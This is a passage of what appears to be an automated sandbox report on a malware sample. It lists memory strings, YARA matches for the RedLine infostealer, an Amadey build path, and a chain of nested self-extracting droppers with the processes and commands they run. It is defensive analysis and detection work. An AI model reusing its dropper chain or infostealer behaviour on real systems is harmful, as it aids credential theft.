                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                          Source: kxL91dA.exe, 00000005.00000002.328881291.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                          Source: kxL91dA.exe, 00000005.00000002.328881291.0000000002AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response0
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4(
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                          Source: kxL91dA.exe, 00000005.00000002.332458474.0000000003A11000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.000000000387B000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: sMt14vz.exe, 00000002.00000003.242565782.00000000049F8000.00000004.00000020.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000000.267575199.00000000004E2000.00000002.00000001.01000000.00000009.sdmp, kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe.2.drString found in binary or memory: https://api.ip.sb/ip
                          Source: kxL91dA.exe, 00000005.00000002.332458474.0000000003A11000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.000000000387B000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: kxL91dA.exe, 00000005.00000002.332458474.0000000003A11000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.000000000387B000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: kxL91dA.exe, 00000005.00000002.332458474.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.000000000290D000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A6E000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003ACE000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003898000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.00000000039F4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.000000000299A000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003916000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003993000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002A27000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003976000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A11000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.000000000387B000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: kxL91dA.exe, 00000005.00000002.332458474.0000000003A11000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.000000000387B000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: kxL91dA.exe, 00000005.00000002.332458474.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.000000000290D000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A6E000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003ACE000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003898000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.00000000039F4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.000000000299A000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003916000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003993000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002A27000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003976000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A11000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.000000000387B000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                          Source: kxL91dA.exe, 00000005.00000002.332458474.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.000000000290D000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A6E000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003ACE000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003898000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.00000000039F4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.000000000299A000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003916000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003993000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002A27000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003976000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A11000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.000000000387B000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                          Source: kxL91dA.exe, 00000005.00000002.332458474.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A6E000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003898000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003916000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003993000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                          Source: kxL91dA.exe, 00000005.00000002.332458474.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.000000000290D000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A6E000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003ACE000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003898000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.00000000039F4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.000000000299A000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003916000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003993000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002A27000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003976000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A11000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.000000000387B000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                          Source: kxL91dA.exe, 00000005.00000002.332458474.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.000000000290D000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A6E000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003ACE000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003898000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.00000000039F4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.000000000299A000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003916000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003993000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002A27000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003976000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A11000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.000000000387B000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                          System Summary

                          Source: 2.3.sMt14vz.exe.49fac20.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 5.0.kxL91dA.exe.4e0000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 2.3.sMt14vz.exe.49fac20.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe, type: DROPPED Matched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 21fvBVFMsn.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 2.3.sMt14vz.exe.49fac20.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 5.0.kxL91dA.exe.4e0000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 2.3.sMt14vz.exe.49fac20.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe, type: DROPPED Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exe Code function: 0_2_00A41F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00A41F90
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe Code function: 1_2_00321F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00321F90
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe Code function: 2_2_010D1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,2_2_010D1F90
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exe Code function: 0_2_00A43BA2 0_2_00A43BA2
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exe Code function: 0_2_00A45C9E 0_2_00A45C9E
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe Code function: 1_2_00323BA2 1_2_00323BA2
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe Code function: 1_2_00325C9E 1_2_00325C9E
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe Code function: 2_2_010D3BA2 2_2_010D3BA2
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe Code function: 2_2_010D5C9E 2_2_010D5C9E
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe Code function: 5_2_0279F7C8 5_2_0279F7C8
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe Code function: 5_2_0279F368 5_2_0279F368
                          Source: 21fvBVFMsn.exe Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 608538 bytes, 2 files, at 0x2c +A "sEm51bM.exe" +A "nIp99Jf.exe", ID 1891, number 1, 25 datablocks, 0x1503 compression
                          Source: sEm51bM.exe.0.dr Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 415252 bytes, 2 files, at 0x2c +A "sMt14vz.exe" +A "lbt58JR.exe", ID 1972, number 1, 18 datablocks, 0x1503 compression
                          Source: sMt14vz.exe.1.dr Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 50172 bytes, 2 files, at 0x2c +A "ijx54ck.exe" +A "kxL91dA.exe", ID 1952, number 1, 6 datablocks, 0x1503 compression
                          Source: 21fvBVFMsn.exe, 00000000.00000003.241227286.0000000004A02000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs 21fvBVFMsn.exe
                          Source: 21fvBVFMsn.exe Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs 21fvBVFMsn.exe
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exe Section loaded: sfc.dll
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe Section loaded: sfc.dll
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe Section loaded: sfc.dll
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe Section loaded: sfc.dll
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe Section loaded: sfc.dll
                          Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nIp99Jf.exe 0A763637206A70A3EC6707FE5728EA673AE3BC11EB5E059D962E99DCC3991F31
                          Source: 21fvBVFMsn.exe ReversingLabs: Detection: 76%
                          Source: 21fvBVFMsn.exe Virustotal: Detection: 55%
                          Source: 21fvBVFMsn.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: unknown Process created: C:\Users\user\Desktop\21fvBVFMsn.exe C:\Users\user\Desktop\21fvBVFMsn.exe
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exe Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe Process created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe
                          Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe Process created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe
                          Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                          Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ijx54ck.exe.log
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exe File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP
                          Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@12/8@0/1
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exe Code function: 0_2_00A4597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00A4597D
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exe Code function: 0_2_00A43FEF CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,0_2_00A43FEF
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe Code function: 3_2_00007FFBACE61B61 ChangeServiceConfigA,3_2_00007FFBACE61B61
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exe Code function: 0_2_00A44FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,0_2_00A44FE0
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exe Command line argument: Kernel32.dll 0_2_00A42BFB
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe Command line argument: Kernel32.dll 1_2_00322BFB
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe Command line argument: Kernel32.dll 2_2_010D2BFB
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exe Automated click: OK
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe Automated click: OK
                          Source: 21fvBVFMsn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: 21fvBVFMsn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: 21fvBVFMsn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: 21fvBVFMsn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: 21fvBVFMsn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: 21fvBVFMsn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: 21fvBVFMsn.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: Binary string: 0C:\nusegilo zawufeha_koboxuyokefamo\doneni.pdb source: sEm51bM.exe, 00000001.00000003.242054317.0000000004724000.00000004.00000020.00020000.00000000.sdmp, lbt58JR.exe.1.dr
                          Source: Binary string: wextract.pdb source: 21fvBVFMsn.exe, sEm51bM.exe.0.dr, sMt14vz.exe.1.dr
                          Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: 21fvBVFMsn.exe, 00000000.00000003.241383449.0000000002ED4000.00000004.00000020.00020000.00000000.sdmp, 21fvBVFMsn.exe, 00000000.00000003.241227286.0000000004A02000.00000004.00000020.00020000.00000000.sdmp, nIp99Jf.exe.0.dr
                          Source: Binary string: wextract.pdbGCTL source: 21fvBVFMsn.exe, sEm51bM.exe.0.dr, sMt14vz.exe.1.dr
                          Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: sMt14vz.exe, 00000002.00000003.242565782.00000000049F8000.00000004.00000020.00020000.00000000.sdmp, ijx54ck.exe, 00000003.00000000.242765935.00000000006E2000.00000002.00000001.01000000.00000006.sdmp, ijx54ck.exe.2.dr
                          Source: Binary string: C:\nusegilo zawufeha_koboxuyokefamo\doneni.pdb source: sEm51bM.exe, 00000001.00000003.242054317.0000000004724000.00000004.00000020.00020000.00000000.sdmp, lbt58JR.exe.1.dr
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exe Code function: 0_2_00A4724D push ecx; ret 0_2_00A47260
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe Code function: 1_2_0032724D push ecx; ret 1_2_00327260
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe Code function: 2_2_010D724D push ecx; ret 2_2_010D7260
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe Code function: 3_2_00007FFBACE60C91 push eax; ret 3_2_00007FFBACE60DDF
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe Code function: 3_2_00007FFBACE607CA push eax; ret 3_2_00007FFBACE60A0B
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe Code function: 3_2_00007FFBACE61B61 push eax; ret 3_2_00007FFBACE62026
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe Code function: 3_2_00007FFBACE61A1D push eax; ret 3_2_00007FFBACE61B5E
